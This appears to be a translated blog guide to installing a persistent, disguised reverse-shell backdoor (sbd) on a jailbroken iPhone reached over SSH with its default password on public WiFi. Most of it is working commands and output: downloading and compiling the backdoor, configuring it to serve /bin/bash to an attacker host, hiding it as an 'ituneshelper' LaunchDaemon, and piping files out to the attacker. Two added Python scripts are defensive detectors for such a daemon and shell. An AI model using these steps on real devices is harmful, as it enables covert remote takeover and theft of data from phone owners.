
The Coresec blog recently published an interesting guide on installing a persistent backdoor on an iOS device (iPhone, iPod Touch and iPad), provided the system has been jailbroken and root privileges are therefore available.

Many users jailbreak their device to get easy access to their files or to applications (which are then copied illegally). The jailbreak procedure installs the OpenSSH package, which allows remote access to the device through a simple SSH session. Unfortunately, users who do not care about security never change the default password (alpine), so being connected to a public wireless network is enough to become a likely victim of an attacker.

In this article we assume that Mario has jailbroken his iPhone, installed OpenSSH without changing the default password, and is at the university, where a public WiFi network is available without any "Client Isolation" protection.

The attacker scans the university's WiFi network, finds Mario's iPhone and simply opens an SSH session to it. He then installs the sbd-1.36 backdoor developed by Michel Blomgren.

Once the SSH session is open, we install the iphone-gcc compiler package (and make):

iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...

iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...

iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...

Download and extract the backdoor:

iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================>] 84,093 66.3K/s in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe

iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------ 3 1000 100 748 Sep 17 2004 ./
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile
-rw------- 1 1000 100 4880 Sep 11 2004 README
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c
-rw------- 1 1000 100 549 Jun 11 2004 aes.h
drwx------ 2 1000 100 136 Sep 11 2004 binaries/
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c
-rw------- 1 1000 100 898 Sep 9 2004 pel.h
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h

Configure the backdoor in sbd.h (run as a daemon, IP address, port, password, encryption settings, and so on):

iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
 * reconnect every 10 seconds.
 */

#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"

Compile SBD:

iphone4:~/sbd-1.36 root# make
usage:
make unix - Linux, NetBSD, FreeBSD, OpenBSD
make sunos - SunOS (Solaris)
make win32 - native win32 console app (w/ Cygwin + MinGW)
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw - native win32 console app (w/ MinGW MSYS)
make mingwbg - native win32 no-console app (w/ MinGW MSYS)
make cygwin - Cygwin console app
make darwin - Darwin

iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd

iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*

Set the backdoor to start automatically through LaunchDaemons:

iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.ituneshelper.start</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/ituneshelper</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>1</integer>
</dict>
</plist>
EOF

iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist
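An audit that a defender could run over /Library/LaunchDaemons to spot a job like the one just created, written as an added example here and not taken from the Coresec write-up. It feeds two plists (the persistence file from this article, copied as-is, and a constructed minimal stand-in for the stock OpenSSH job) through three checks: whether any dpkg package owns the launched binary (on the device this is what `dpkg -S <path>` answers; DPKG_OWNED below is a constructed stand-in for that answer), whether StartInterval relaunches the job every few seconds, and whether the Label borrows a vendor name while the binary sits outside Apple's own directories. The names audit_launch_daemon, audit_all, DPKG_OWNED, APPLE_LIKE_WORDS and APPLE_DIRS are assumptions of this example.

```python
import plistlib
from typing import Dict, List, Set

# Constructed sample input: the plist dropped in this article (copied as-is) beside a
# minimal, constructed stand-in for the stock OpenSSH LaunchDaemon (not the real file).
SAMPLE_PLISTS: Dict[str, bytes] = {
    "/Library/LaunchDaemons/com.ituneshelper.start.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.ituneshelper.start</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/ituneshelper</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>1</integer>
</dict>
</plist>
""",
    "/Library/LaunchDaemons/com.openssh.sshd.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.openssh.sshd</string>
<key>ProgramArguments</key>
<array>
<string>/usr/sbin/sshd</string>
<string>-i</string>
</array>
</dict>
</plist>
""",
}

# Constructed stand-in for what `dpkg -S <path>` reports on the device: binaries that
# some installed package owns. /usr/bin/ituneshelper is deliberately absent.
DPKG_OWNED: Set[str] = {"/usr/sbin/sshd"}

# Vendor words often borrowed by look-alike labels, and directories stock daemons live in.
APPLE_LIKE_WORDS = ("apple", "itunes", "icloud", "springboard")
APPLE_DIRS = ("/System/", "/usr/libexec/")


def audit_launch_daemon(path: str, raw: bytes, dpkg_owned: Set[str]) -> List[str]:
    """Return the reasons this LaunchDaemon plist deserves a look (empty list = nothing odd)."""
    plist = plistlib.loads(raw)
    label = str(plist.get("Label", ""))
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else None)
    if program is None:
        return [f"{path}: no Program or ProgramArguments"]
    reasons: List[str] = []
    # 1. A binary that no package owns was placed there by hand (or by an intruder).
    if program not in dpkg_owned and not program.startswith("/System/"):
        reasons.append(f"binary not owned by any package: {program}")
    # 2. A tiny StartInterval makes launchd relaunch the job every few seconds (a keep-alive).
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval < 60:
        reasons.append(f"StartInterval {interval}s keeps relaunching the job")
    # 3. A vendor-looking label paired with a binary outside the vendor's directories.
    if any(w in label.lower() for w in APPLE_LIKE_WORDS) and not program.startswith(APPLE_DIRS):
        reasons.append(f"label {label!r} mimics a vendor name but runs {program}")
    return reasons


def audit_all(plists: Dict[str, bytes], dpkg_owned: Set[str]) -> Dict[str, List[str]]:
    """Map each suspicious plist path to its reasons; clean plists are left out."""
    findings: Dict[str, List[str]] = {}
    for path, raw in plists.items():
        reasons = audit_launch_daemon(path, raw, dpkg_owned)
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in audit_all(SAMPLE_PLISTS, DPKG_OWNED).items():
        print(path)
        for r in reasons:
            print("  -", r)
```

Run as root on the device, the same logic would read every file under /Library/LaunchDaemons and replace DPKG_OWNED with the real output of dpkg -S. On the sample input the article's plist trips all three checks, while the sshd job trips none; the dpkg check is the one that matters most, since a label and a file name can be chosen to look like anything.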

The backdoor installation is complete, so we now test the connection from our PC:

root@coresec:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

root@coresec:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)

root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef

bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
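The ps -ef listing above is itself the indicator worth looking for on a device: an interactive shell with no controlling terminal (TTY shown as ??) whose parent chain leads back to launchd through a binary that is not a stock daemon. The following is an added example, not part of the original article: it parses a constructed excerpt of that listing (a subset of the rows above, unchanged) and reports every headless shell together with its ancestry. The names parse_ps, ancestry, find_headless_shells and SHELLS are assumptions of this example.

```python
import os
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed excerpt of the `ps -ef` output shown above (a subset of its rows, unchanged).
SAMPLE_PS = """\
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef
"""

# Command names treated as shells (assumed list for this example).
SHELLS: Set[str] = {"bash", "sh", "zsh", "dash", "ksh"}


@dataclass
class Proc:
    pid: int
    ppid: int
    uid: int
    tty: str
    cmd: str


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse the eight-column `ps -ef` layout used in the listing above (header row skipped)."""
    procs: Dict[int, Proc] = {}
    for line in text.strip().splitlines()[1:]:
        # The command line may contain spaces, so split into at most eight fields.
        uid, pid, ppid, _c, _stime, tty, _time, cmd = line.split(None, 7)
        procs[int(pid)] = Proc(int(pid), int(ppid), int(uid), tty, cmd)
    return procs


def is_shell(cmd: str) -> bool:
    """True when the first word of the command line is a known shell binary."""
    return os.path.basename(cmd.split()[0]) in SHELLS


def ancestry(procs: Dict[int, Proc], pid: int) -> List[str]:
    """Command lines from the given process up to the root of the tree (launchd)."""
    chain: List[str] = []
    seen: Set[int] = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid].cmd)
        pid = procs[pid].ppid
    return chain


def find_headless_shells(ps_text: str) -> Dict[int, List[str]]:
    """Shells with no controlling terminal (TTY '??'), keyed by pid, with their ancestry."""
    procs = parse_ps(ps_text)
    return {
        p.pid: ancestry(procs, p.pid)
        for p in procs.values()
        if p.tty == "??" and is_shell(p.cmd)
    }


if __name__ == "__main__":
    for pid, chain in find_headless_shells(SAMPLE_PS).items():
        print(f"pid {pid}: " + " <- ".join(chain))
```

On the sample rows the two shells (pid 286 and 300) are reported, and their ancestry shows the chain bash <- /usr/bin/ituneshelper <- /sbin/launchd, which is exactly what the LaunchDaemon set up earlier produces. A shell opened over a normal SSH login would instead sit under sshd and usually carry a pseudo-terminal, so it would not match.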

If, for example, we want to transfer a file from the device:

root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file

iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345

Finally, here is the procedure to uninstall the backdoor:

iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper